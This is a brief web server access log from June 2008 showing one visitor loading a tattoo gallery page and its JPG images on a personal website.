124.87.2.228 - - [12/Jun/2008:08:32:11 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:12 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:12 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:12 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:12 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:12 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:12 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:12 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:13 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
